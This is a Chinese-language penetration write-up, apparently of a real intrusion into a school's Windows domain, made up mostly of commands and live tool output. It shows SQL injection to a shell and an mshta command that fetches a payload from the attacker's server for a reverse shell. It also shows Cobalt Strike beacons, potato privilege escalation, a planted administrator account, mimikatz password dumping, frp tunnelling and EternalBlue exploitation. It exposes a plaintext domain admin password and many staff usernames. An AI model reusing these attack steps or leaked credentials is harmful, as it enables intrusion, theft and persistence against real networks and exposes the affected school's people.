本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
文章来****源:先知社区
Sqlmap --sql-shell
Sqlmap --sql-shell命令,获取一个命令行模式。
xp_cmdshell,先查看是否存在
sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
[22:01:36] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
[22:01:36] [INFO] resumed: '1'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell': '1'
启用 xp_cmdshell
sql-shell> EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[09:48:09] [INFO] executing SQL data execution statement: 'EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE'
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE: 'NULL'
尝试执行命令
sql-shell> exec master..xp_cmdshell 'whoami'
[09:48:58] [INFO] executing SQL data execution statement: 'exec master..xp_cmdshell 'whoami''
exec master..xp_cmdshell 'whoami': 'NULL'
命令无回显,应该是服务器被降权。
sql-shell> select @@servername
[23:02:04] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
[23:02:05] [INFO] retrieved: 'NEWDATABASE'
select @@servername: 'NEWDATABASE'
sql-shell> select host_name()
[23:02:19] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
[23:02:21] [INFO] retrieved: 'MAIL'
select host_name(): 'MAIL'
开始撸内网
目标系统为:
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012
尝试各种命令但是发现回显太慢,未找到 web 路径,无法写 web 马、exe 马,这里尝试使用 hta 文件。
➜ ~ sqlmap -r /Users/apple/Desktop/1.txt --os-shell
msf 启动
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://0.0.0.0:8080/8HGLrG47OUEJ.hta
[*] Local IP: http://vps:8080/8HGLrG47OUEJ.hta
[*] Server started.
在目标机器执行
mshta.exe http://vps:8080/8HGLrG47OUEJ.hta
maf 回显
[*] ip hta_server - Delivering Payload
[*] Sending stage (175174 bytes) to ip
[*] Meterpreter session 1 opened (vps_ip:4444 -> ip:61915) at 2020-12-04 10:01:42 +0800
msf6 exploit(windows/misc/hta_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT Service\MSSQLSERVER @ DATABASE vps_ip:4444 -> ip:61915 (10.10.10.5)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
查看目标系统信息
meterpreter > sysinfo
Computer : DATABASE
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_TW
Domain : WEGO
Logged On Users : 14
Meterpreter : x86/windows
进入 shell 查看一下具体信息,有乱码设置一下编码
C:\Windows\system32>chcp 65001
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : database
Primary Dns Suffix . . . . . . . : xx.xx.x x.xx
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xx.xx.x x.xx
Ethernet adapter NIC2:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
Physical Address. . . . . . . . . : 10-98-36-B0-ED-AE
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter NIC1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
Physical Address. . . . . . . . . : 10-98-36-B0-ED-AD
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.254
DNS Servers . . . . . . . . . . . : 10.10.10.3
10.10.10.2
NetBIOS over Tcpip. . . . . . . . : Enabled
具有内网环境,DNS 服务器可能就是域控。
DNS Servers . . . . . . . . . . . : 10.10.10.3
10.10.10.2
查看当前用户
C:\Windows\system32>whoami
whoami
nt service\mssqlserver
查看系统信息,打得补丁还是比较多的。
systeminfo
也可以使用 msf 模块搜索可执行的本地提权信息
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 35 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
ms16_075 烂土豆提权,直接使用 msf 进行提权,提权提崩了。。。,尝试 exe 提权,发现目录不可写。权限不够。(应该找可写目录的,后来找到一个可写目录。)
meterpreter > upload /tmp/beacon.exe C:/Windows/Temp
加载插件,插件下载地址:
https://github.com/scanfsec/AggressorCNA/blob/master/reflectiveJuicyPotato/juicypotato.cn
beacon> elevate juicypotato http
[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via JuicyPotato (ms16-075)
[+] host called home, sent: 599618 bytes
[+] received output:
.
[+] received output:
..
[+] received output:
..
[+] received output:
.
[+] received output:
[+] authresult 0
[*] {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
提权失败,接着使用另一个脚本
[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via RottenPotato (ms16-075)
[*] Tasked beacon to spawn NTLM DCOM->RPC NTLM Reflection (MS16-075)
[+] host called home, sent: 256865 bytes
成功返回一个 shell,system 权限。
good beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt service\mssqlserver
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
但是当前用户确实 mssql,权限确实 system 权限,mssql 上线需要迁移进程。
beacon> shell net localgroup
[*] Tasked beacon to run: net localgroup
[+] host called home, sent: 45 bytes
[+] received output:
\\DATABASE 的別名
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*HelpLibraryUpdaters
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$NEWDATABASE
*SQLServerMSASUser$NEWDATABASE$MSSQLSERVER
*Users
*WinRMRemoteWMIUsers__
命令已经成功完成。
使用当前 beacon,注入一个 administrator 用户的进程。
成功生成一个 beacon。
先创建用户并加入管理员组
查看用户组
beacon> shell net localgroup Administrators good /add
[*] Tasked beacon to run: net localgroup Administrators good /add
[+] host called home, sent: 70 bytes
[+] received output:
命令已经成功完成。
管理员组添加用户
beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
別名 Administrators
註解 Administrators 可以完全不受限制地存取电脑/网域
成員
-------------------------------------------------------------------------------
Administrator
good
HelpAssistant
WEGO\Domain Admins
命令已经成功完成。
查看管理员组
beacon> portscan 10.10.10.5 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.10.10.5
[+] host called home, sent: 93245 bytes
[+] received output:
(ARP) Target '10.10.10.5' is alive. 10-98-36-B0-ED-AD
10.10.10.5:5985
[+] received output:
10.10.10.5:3389
[+] received output:
10.10.10.5:139
10.10.10.5:135
10.10.10.5:80
10.10.10.5:445 (platform: 500 version: 6.3 name: DATABASE domain: WEGO)
Scanner module is complete
端口扫描,尝试连接 3389
beacon> logonpasswords
wdigest :
* Username : Administrator
* Domain : WEGO
* Password : jo6ek6vul3vm,6
运行 mimikatz 抓密码。
beacon> socks 1070
[+] started SOCKS4a server on: 1070
[+] host called home, sent: 16 bytes
打域控,挂 socker 代理 (cs 的 socks4 很不好用,后来使用的是 frp)。
shell net config Workstation
beacon> shell net config Workstation
[*] Tasked beacon to run: net config Workstation
[+] host called home, sent: 53 bytes
[+] received output:
电脑名称 \\DATABASE
完整电脑名称 database.xx.xx.x x.xx
使用者名称 Administrator
工作站启动于
NetBT_Tcpip_{2B6B95FB-22AC-4BE5-9B0E-6778A02AF68C} (109836B0EDAD)
软体版本 Windows Server 2012 R2 Standard
工作站网域 WEGO
工作站网域 DNS 名称 xx.xx.x x.xx
登入网域 WEGO
COM 启用等候逾时(秒) 0
COM 传送计数 (位元组) 16
COM 传送等候逾时(千分之一秒) 250
命令已经成功完成。
beacon> shell net view /domain
[*] Tasked beacon to run: net view /domain
[+] host called home, sent: 47 bytes
[+] received output:
Domain
-------------------------------------------------------------------------------
KG
WEGO
WORKGROUP
命令已经成功完成。
查询有几个域, 查询域列表
beacon> shell net group "domain controllers" /domain
[*] Tasked beacon to run: net group "domain controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
这项要求会在网域 xx.xx.x x.xx 下的网域控制站处理。
群组名称 Domain Controllers
註解 在网域所有的网域控制站
成员
-------------------------------------------------------------------------------
AD1$ AD2$ AD3$
命令已经成功完成
beacon> shell net group "domain controllers" /domain
[*] Tasked beacon to run: net group "domain controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
这项要求会在网域 xx.xx.x x.xx 下的网域控制站处理。
群组名称 Domain Controllers
註解 在网域所有的网域控制站
成员
-------------------------------------------------------------------------------
AD1$ AD2$ AD3$
命令已经成功完成
beacon> shell ping AD1.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD1.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD1.xx.xx.x x.xx [10.10.10.2] (使用 32 位元组的资料):
回覆自 10.10.10.2: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.2: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.2: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.2: 位元组=32 时间<1ms TTL=128
10.10.10.2 的 Ping 统计资料:
封包: 已传送 = 4,已收到 = 4, 已遗失 = 0 (0% 遗失),
大约的来回时间 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0ms
beacon> shell ping AD2.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD2.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD2.xx.xx.x x.xx [10.10.10.3] (使用 32 位元组的资料):
回覆自 10.10.10.3: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.3: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.3: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.3: 位元组=32 时间<1ms TTL=128
10.10.10.3 的 Ping 统计资料:
封包: 已传送 = 4,已收到 = 4, 已遗失 = 0 (0% 遗失),
大约的来回时间 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0ms
beacon> shell ping AD3.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD3.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD3.xx.xx.x x.xx [10.10.10.4] (使用 32 位元组的资料):
回覆自 10.10.10.4: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.4: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.4: 位元组=32 时间<1ms TTL=128
回覆自 10.10.10.4: 位元组=32 时间<1ms TTL=128
10.10.10.4 的 Ping 统计资料:
封包: 已传送 = 4,已收到 = 4, 已遗失 = 0 (0% 遗失),
大约的来回时间 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0ms
beacon> shell net group "domain admins" /domain
[*] Tasked beacon to run: net group "domain admins" /domain
[+] host called home, sent: 64 bytes
[+] received output:
这项要求会在网域 xx.xx.x x.xx 下的网域控制站处理。
群组名称 Domain Admins
註解 指定的网域系统管理员
成员
-------------------------------------------------------------------------------
Administrator albert_huang chuck_ho
jerrytsao juinyih se
srj wegovpn2020
命令已经成功完成
beacon> shell net user /domain
[*] Tasked beacon to run: net user /domain
[+] host called home, sent: 47 bytes
[+] received output:
这项要求会在网域 xx.xx.x x.xx 下的网域控制站处理。
\\AD2.xx.xx.x x.xx 的使用者帐户
-------------------------------------------------------------------------------
098 201sandy 203savanah
204hanna 205vanessa 213amy
2305 3557 526alice
account Administrator affair
albert_huang alice31707 alison
amy amyjccd andrewmunro
anita anne ap7653
argreschler ashinlover ashleychen
beauc berrywu bkmanager
brandonolen busm caca
camy4648 carolina caroline
cashier charlie chellie72
cherry2011 cheryllin chi
chi0707 CHIAEN christina
christinelee chuanmien chuck_ho
chunying cindykyang cleeve
collinsko0109 cyajen0717 Dale
dfl001 dianahou director
dola dperabo eileen5717
epayding esansan eslteacher
eusebia evanceho faithtien
fatfat1188 fayina flowerrr
guccichia Guest gvholley
haiyou ikuchen indigododos
iriscai IUSER_WEGONET IUSER_WGPS
IUSR_MAIL ivyc ivyhou
IWAM_MAIL j5218 Jacobson8959
jennifer jennifer_liang jerrytsao
jessicama711 jgtoma jih455
beacon> shell net view
[*] Tasked beacon to run: net view
[+] host called home, sent: 39 bytes
[+] received output:
伺服器名称 说明
-------------------------------------------------------------------------------
\\3060-1E
\\3060-2E
\\3060-2F
\\3060-4B
\\3060-5C
\\3060-5D
\\ACADEMIC
\\ACCOUNT-3070
\\ACCOUNT3050 会计组长
\\AD1
\\AD2
\\AD3
\\AFFAIRS-3060
\\ASUS-500G4-PC
\\CARD100 卡钟主机
\\CDTOWER17
\\DATABASE
\\DELL7020B-36
\\DFL-3340-67
\\DFL-FILES2017
\\FILES
\\FILES2
\\LIB-3020-83
\\LIB-7020-82
\\MAIL
\\MEDIA-DOME
\\PCSCRIBE-7
\\PCTEACHER-100
\\PERSONNEL-3060
\\STPC-01
\\STPC-02
\\STPC-03
\\STPC-04
\\STPC-05
\\STPC-06
\\STPC-07
\\STPC-08
\\STPC-09
\\STPC-10
\\STPC-11
\\STPC-12
\\STPC-13
\\STPC-14
\\STPC-15
\\STPC-16
\\STPC-17
\\STPC-18
\\STPC-19
\\STPC-20
\\STPC-21
\\STPC-22
\\STPC-23
\\STPC-24
\\STPC-25
\\STPC-26
\\STPC-27
\\STPC-28
\\STPC-29
\\STPC-30
\\STPC-31
\\STPC-32
\\STPC-33
\\STPC-34
\\STPC-35
\\STPC-36
\\STPC-37
\\STPC-39
\\STPC-40
\\STPC-41
\\STPC-42
\\STPC-47
\\STUFILES
\\WIN101C
\\WIN106D
\\WIN10MUSIC56
net view /domain:XXX
beacon> shell net group "domain computers" /domain
[*] Tasked beacon to run: net group "domain computers" /domain
[+] host called home, sent: 67 bytes
[+] received output:
这项要求会在网域 xx.xx.x x.xx 下的网域控制站处理。
群组名称 Domain Computers
註解 所有已加入网域的工作站及伺服器
成员
-------------------------------------------------------------------------------
1A86TV$ 2003R2-32BITS$ 2003SERVER$
3060-1E$ 3060-1F$ 3060-2A$
3060-2B$ 3060-2C$ 3060-2D$
3060-2E$ 3060-2F$ 3060-4A$
3060-4B$ 3060-4C$ 3060-4D$
3060-5A$ 3060-5B$ 3060-5C$
3060-5D$ 3060-6E$ 3060-6F$
3060CALLIGRAPHY$ 4730WORK$ ACADEMIC$
ACCOUNT3050$ ACCOUNT-3070$ ACCOUNT-7$
ACTIVITES-3020A$ ACTIVITES-3020B$ ACTIVITIES3020C$
ACTIVITY-181$ AD2-NEW$ AD3-OLD$
ADMINISTRATOR$ AFFAIRS-3060$ ALBERT_HUANG$
ANNALIU$ ANNALIU-XP-VM$ ASUS-500G4-PC$
B8AC6F362198$ B8AC6F3C1711$ B8AC6F3C727F$
CALLIGRAPHY3060$ CARD100$ CASHIER-3070$
CASHIER7$ CDTOWER17$ CG-86TV$
CHIEF-PE$ CURRICULUM-2019$ CURRICULUM-3060$
DATABASE$ DB2019$ DELL-2420-3$
DELL7020B-36$ DELL7020B-PC$ DELL9020-PC$
DELLPC$ DFL-3340-65$ DFL-3340-66$
DFL-3340-67$ DFL-3340-70$ DFL-3340ENG-68$
DFL-3340ENG-69$ DFL-3380-81$ DFL-3380-82$
DFL-3400-85$ DFL-3400-86$ DFL-4730-80$
DFL-ACER-82$ DFL-ACER-84$ DFL-ACTIVITIES$
DFL-CURRICULUM$ DFL-FILES2017$ DFL-NB1$
DFL-NB10$ DFL-NB11$ DFL-NB3$
DFL-NB4$ DFL-NB5$ DFL-NB6$
DFL-NB7$ DFL-NB9$ DFL-SUPERVISOR2$
DIR-AFFAIRS$ DIR-DFL$ DIR-JAPAN$
DIR-STUDENT$ DISCIPLINE-3060$ ESL-603$
ESLNB-2420-C$ ESLNB-2420-R$ ESL-P243-1$
ESL-P243-2$ ESL-P243-3$ ESL-P243-4$
FILES$ FILES2$ FITNESSCENTER$
HAPPY-HOUSE$ HEALTH-3060$ HEALTH7$
HEALTH-SERVICE$ HYGIENE-3070$ HYPERV2008R2$
JAPAN77-TEACHER$ KITCHEN3020$ KITCHEN-7-60$
LIB-3020-83$ LIB-3020-84$ LIB-3020-85$
LIB-3020-86$ LIB-3020-87$ LIB3060TEACHER$
LIB-3060TEACHER$ LIB-7020-82$ LIB-TEACHER$
MAIL$ MAIL2$ MEDIA-DOME$
ML20936$ ML20936-PC$ nas8be8d1$
nasbfa3ee$ NEW_NB01$ NEW-WIN$
NWIN7-0$ NWIN7-1$ NWIN7-2$
NWIN7-3$ NWIN7-4$ OLD-DATA814$
OLDDATABASE$ PCSCRIBE-7$ PCTEACHER-100$
PE-3060$ PERSONNEL-3060$ PRINCIPAL$
PRINCIPAL-21$ PROGRAMER$ REGISTRAR-3070$
SCHOOL2003$ SCHOOL-3070$ SCHOOL-PC-01$
SCHOOL-PC-02$ SCHOOL-SYS$ SCHOOLWU-PC$
SE$ SE7$ SE-PC$
SE-XP$ ST-00$ ST000$
ST-000$ ST50$ ST50PC$
STPC-01$ STPC-02$ STPC-03$
STPC-04$ STPC-05$ STPC-06$
STPC-07$ STPC-08$ STPC-09$
STPC-10$ STPC-11$ STPC-12$
STPC-13$ STPC-14$ STPC-15$
STPC-16$ STPC-17$ STPC-18$
STPC-19$ STPC-20$ STPC-21$
STPC-22$ STPC-23$ STPC-24$
STPC-25$ STPC-26$ STPC-27$
STPC-28$ STPC-29$ STPC-30$
STPC-31$ STPC-32$ STPC-33$
STPC-34$ STPC-35$ STPC-36$
STPC-37$ STPC-38$ STPC-39$
STPC-40$ STPC-41$ STPC-42$
STPC-43$ STPC-44$ STPC-45$
STPC-46$ STPC-47$ STPC-48$
STPC-49$ STPREPC$ STPRE-PC$
STUFILES$ SURVEILLANCE$ T1-WIN7$
TEACHER-WU$ TEST-WIN10-1$ TRYPC001$
VICE-DIRECTOR$ VICE-PRINCIPAL$ VIDEOSPIDER$
WEGO-DC3$ WEGO-DC4$ WIN101A$
WIN101B$ WIN101C$ WIN101D$
WIN103A$ WIN103B$ WIN103C$
WIN103D$ WIN103E$ WIN103F$
WIN104E$ WIN104F$ WIN105E$
WIN105F$ WIN106A$ WIN106B$
WIN106C$ WIN106D$ WIN106E$
WIN10ART12$ WIN10-ART12$ WIN10ART34$
WIN10ART56$ WIN10MULTI$ WIN10MUSIC34$
WIN10MUSIC56$ WIN10OFFICE01$ WIN10OFFICE02$
WIN10OFFICE03$ WIN10OFFICE04$ WIN10SCIENCE34$
WIN10SCIENCE56$ WIN7PROX86-01$ WIN7VM$
WIN7VM-AP$ WU-TEACHING$
beacon> shell C:\Windows\TAPI\SharpHound.exe -c all
[*] Tasked beacon to run: C:\Windows\TAPI\SharpHound.exe -c all
[+] host called home, sent: 68 bytes
[+] received output:
------------------------------------------------
Initializing SharpHound at 下午 03:37 on 2020/12/8
------------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain xx.xx.x x.xx using path CN=Schema,CN=Configuration,DC=WGPS,DC=TP,DC=EDU,DC=TW
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
[+] received output:
[+] Creating Schema map for domain 10.10.11.13 using path CN=Schema,CN=Configuration,DC=10,DC=10,DC=11,DC=13
Status: 1528 objects finished (+1528 52.68966)/s -- Using 50 MB RAM
[+] received output:
Status: 1674 objects finished (+146 28.37288)/s -- Using 49 MB RAM
[+] received output:
Status: 1675 objects finished (+1 18.61111)/s -- Using 47 MB RAM
[+] received output:
Status: 1675 objects finished (+0 13.95833)/s -- Using 47 MB RAM
[+] received output:
Status: 1676 objects finished (+1 11.63889)/s -- Using 47 MB RAM
Enumeration finished in 00:02:24.3737596
Compressing data to .\20201208153758_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 下午 03:40 on 2020/12/8! Happy Graphing!
[common]
bind_addr = 0.0.0.0
dashboard_user = good
dashboard_pwd = good
dashboard_port = 7500
bind_port = 7000
内网代理搭建
一开始我使用的是 cs 的自带代理信息 socks4,发现很不稳定,之后使用 frp 进行穿透。
服务端 vps
[common]
server_addr =1.1.1.1
server_port = 7000
[socks5]
type = tcp
remote_port = 60000
plugin = socks5
use_encryption = true
use_compression = true
访问 vps:7500 端口,也是可以看到图形界面。
目标靶机
配置 frpc.ini
beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini (C:\Windows\TAPI\frpc_full.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini as C:\Windows\TAPI\frpc_full.ini
[+] host called home, sent: 8402 bytes
beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini (C:\Windows\TAPI\frpc.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini as C:\Windows\TAPI\frpc.ini
[+] host called home, sent: 195 bytes
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc as C:\Windows\TAPI\frpc
上传 frpc
beacon> shell C:\Windows\TAPI\fscan64.exe -h 10.10.10.1/24 -p 445
win10 虚拟机中,使用 Proxifier,配置代理。
之后使用任何软件,右键 ->Proxifier-> 选择正确的代理。
查看开放 445 端口的主机
fscan -h 10.10.10.5 -p 445 -user Administrator -pwd jo6ek6vul3vm,6 -domain WEGO -np
本地挂代理使用 fscan 进行扫描
go run main.go -h 10.10.10.5 -p 445 -np -user Administrator -pwd jo6ek6vul3vm,6 -domain
SMB:10.10.10.3:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.41:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.19:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.20:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.126:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.154:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.4:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.1:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.6:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.2:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.100:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.42:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.10:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.5:445:Administrator jo6ek6vul3vm,6 WEGO
或者
beacon> Ladon 10.10.10.8/24 MS17010
[+] host called home, sent: 1036383 bytes
[+] received output:
Ladon 7.0
Start: 2020-12-04 17:29:22
Runtime: .net 4.0 OS Arch: x64
OS Name: Microsoft Windows Server 2012 R2 Standard
10.10.10.8/24
load MS17010
10.10.10.8/24 is Valid CIDR
IPCound: 256
Scan Start: 2020-12-04 17:29:22
10.10.10.1 MAIL xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.48 neweclient.xx.xx.x x.xx
10.10.10.34 workpc2019.xx.xx.x x.xx
10.10.10.20 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.19 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.5 DATABASE xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.42 account-7.xx.xx.x x.xx
10.10.10.46 account3050.xx.xx.x x.xx
10.10.10.38 dell7020b-36.xx.xx.x x.xx
10.10.10.8 WIN-XF2DOSIWBRF [Win (R) 2008 Standard 6003 SP 2]
10.10.10.6 FILES xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.9 WIN-XF2DOSIWBRF [Win (R) 2008 Standard 6003 SP 2]
10.10.10.4 AD3 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.17 CDTOWER17 xx.xx.x x.xx [??渀?漀?猀??攀?瘀攀???刀??? ???琀愀渀?愀???? ???攀?瘀?挀攀?倀愀挀欀??]
10.10.10.2 AD1 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.39 ASUS-500G4-PC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.3 AD2 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.45 KG-JOOMLA [Win 2008 R2 Standard 7601 SP 1]
10.10.10.35 2014JUINYIHWIN7 [Win 7 Professional 7601 SP 1]
10.10.10.22 ACADEMIC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.100 CARD100 [Win 7 Professional 7601 SP 1]
10.10.10.90 DFL-FILES2017 [Win 6.1]
[+] received output:
10.10.10.10 MEDIA-DOME [Win 6.1]
[+] received output:
10.10.10.59 school-3070.xx.xx.x x.xx
[+] received output:
10.10.10.115 3060-1e.xx.xx.x x.xx
10.10.10.126 3060-2f.xx.xx.x x.xx
10.10.10.142 win104b.xx.xx.x x.xx
10.10.10.154 3060-5d.xx.xx.x x.xx
[+] received output:
=============================================
OnlinePC:34
Cidr Scan Finished!
End: 2020-12-04 17:30:06
尝试登录域控制器 3389。
10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
41 这个 IP 有漏洞
check.bat IP
ms17010.bat IP +系统版本
go.bat IP 位数
C:\Users\good>cd C:\Users\good\Desktop\nw\ms17-010\
C:\Users\good\Desktop\nw\ms17-010>check.bat 10.10.10.41
[+] SMB Touch started
[*] TargetIp 10.10.10.41
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 6.1 build 7601
Windows 7 Professional 7601 Service Pack 1
[*] Trying pipes...
[-] spoolss - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] browser - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] lsarpc - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Not Vulnerable]
ETERNALROMANCE - Named pipe required for exploit
[Vulnerable]
ETERNALBLUE - DANE
ETERNALCHAMPION - DANE
[*] Writing output parameters
[+] Target is vulnerable to 2 exploits
[+] Touch completed successfully
C:\Users\good\Desktop\nw\ms17-010>MS17-010_.bat 10.10.10.41
[*] MS17-010 Exploit // lu4n.com
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 64
Architecture: 64 is not a valid value.
Architecture: 64 is not a valid value.
^C终止批处理操作吗(Y/N)? y
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x64
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
[-] DLL NOT built
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
